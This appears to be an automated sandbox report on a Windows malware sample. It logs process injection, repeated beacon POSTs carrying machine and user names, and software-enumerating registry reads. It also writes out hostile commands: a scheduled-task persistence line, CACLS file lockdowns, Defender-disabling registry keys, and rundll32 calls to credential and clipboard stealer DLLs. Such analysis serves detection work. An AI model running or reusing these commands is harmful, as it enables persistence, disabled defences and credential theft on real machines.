regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000274
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0
process Utsysc.exe useragent
process AppLaunch.exe useragent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
process iexplore.exe useragent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Process injection Process 3664 called NtSetContextThread to modify thread in remote process 3708
Process injection Process 3768 called NtSetContextThread to modify thread in remote process 3856
Process injection Process 4092 called NtSetContextThread to modify thread in remote process 3124
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 1995571652
registers.esp: 3734432
registers.edi: 0
registers.eax: 4211454
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000114
process_identifier: 3708
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 3472984
registers.edi: 0
registers.eax: 4198977
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000114
process_identifier: 3856
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 3865952
registers.edi: 0
registers.eax: 4382478
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000114
process_identifier: 3124
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0
Process injection Process 3664 resumed a thread in remote process 3708
Process injection Process 3768 resumed a thread in remote process 3856
Process injection Process 4092 resumed a thread in remote process 3124
Process injection Process 3432 resumed a thread in remote process 2964
Process injection Process 3544 resumed a thread in remote process 552
Process injection Process 3544 resumed a thread in remote process 1772
Process injection Process 3544 resumed a thread in remote process 948
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000114
suspend_count: 1
process_identifier: 3708
1 0 0

NtResumeThread

thread_handle: 0x00000114
suspend_count: 1
process_identifier: 3856
1 0 0

NtResumeThread

thread_handle: 0x00000114
suspend_count: 1
process_identifier: 3124
1 0 0

NtResumeThread

thread_handle: 0x00000254
suspend_count: 1
process_identifier: 2964
1 0 0

NtResumeThread

thread_handle: 0x0000038c
suspend_count: 1
process_identifier: 552
1 0 0

NtResumeThread

thread_handle: 0x00000544
suspend_count: 1
process_identifier: 1772
1 0 0

NtResumeThread

thread_handle: 0x00000600
suspend_count: 1
process_identifier: 948
1 0 0
cmdline CACLS "..\fefffe8cea" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
cmdline CACLS "..\ea7c8244c8" /P "test22:N"
cmdline cmd /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline CACLS "..\e8b5234212" /P "test22:R" /E
cmdline cmd /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline CACLS "Utsysc.exe" /P "test22:R" /E
cmdline cmd /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
cmdline CACLS "..\e8b5234212" /P "test22:N"
cmdline CACLS "Utsysc.exe" /P "test22:N"
cmdline CACLS "explothe.exe" /P "test22:N"
cmdline CACLS "..\ea7c8244c8" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline CACLS "..\fefffe8cea" /P "test22:N"
cmdline CACLS "explothe.exe" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2684
thread_handle: 0x0000031c
process_identifier: 2680
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000324
1 1 0

NtResumeThread

thread_handle: 0x0000022c
suspend_count: 1
process_identifier: 2680
1 0 0

CreateProcessInternalW

thread_identifier: 2776
thread_handle: 0x00000250
process_identifier: 2772
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000258
1 1 0

CreateProcessInternalW

thread_identifier: 2840
thread_handle: 0x00000250
process_identifier: 2836
current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000260
1 1 0

CreateProcessInternalW

thread_identifier: 2220
thread_handle: 0x00000388
process_identifier: 2200
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000006001\1.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000038c
1 1 0

CreateProcessInternalW

thread_identifier: 2476
thread_handle: 0x000003d8
process_identifier: 2472
current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\aca439ae61e801\cred64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003ec
1 1 0

CreateProcessInternalW

thread_identifier: 2596
thread_handle: 0x000003d0
process_identifier: 2592
current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\aca439ae61e801\clip64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003f4
1 1 0

CreateProcessInternalW

thread_identifier: 2744
thread_handle: 0x00000394
process_identifier: 2752
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000008001\abd.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000390
1 1 0

CreateProcessInternalW

thread_identifier: 1108
thread_handle: 0x00000364
process_identifier: 1996
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000009001\trafico.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x000003c0
1 1 0

CreateProcessInternalW

thread_identifier: 1096
thread_handle: 0x000003a8
process_identifier: 1520
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000020001\TEST32.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x000003e0
1 1 0

CreateProcessInternalW

thread_identifier: 1504
thread_handle: 0x0000039c
process_identifier: 1456
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000024001\build2.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x000003ac
1 1 0

CreateProcessInternalW

thread_identifier: 2856
thread_handle: 0x000003c8
process_identifier: 1792
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000027001\TEST32.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x000003e0
1 1 0

CreateProcessInternalW

thread_identifier: 3380
thread_handle: 0x000003d0
process_identifier: 3376
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000029001\lom30.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000274
1 1 0

CreateProcessInternalW

thread_identifier: 2916
thread_handle: 0x0000008c
process_identifier: 2912
current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2956
thread_handle: 0x00000088
process_identifier: 2952
current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "Utsysc.exe" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 3008
thread_handle: 0x0000008c
process_identifier: 3004
current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "Utsysc.exe" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 3056
thread_handle: 0x0000008c
process_identifier: 3052
current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

thread_identifier: 812
thread_handle: 0x00000094
process_identifier: 604
current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\e8b5234212" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 2104
thread_handle: 0x0000008c
process_identifier: 2124
current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\e8b5234212" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

NtResumeThread

thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 2952
1 0 0

NtResumeThread

thread_handle: 0x0000009c
suspend_count: 1
process_identifier: 3004
1 0 0

NtResumeThread

thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

thread_handle: 0x00000098
suspend_count: 1
process_identifier: 2124
1 0 0

NtResumeThread

thread_handle: 0x000000f4
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x0000016c
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x000001a8
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000228
suspend_count: 1
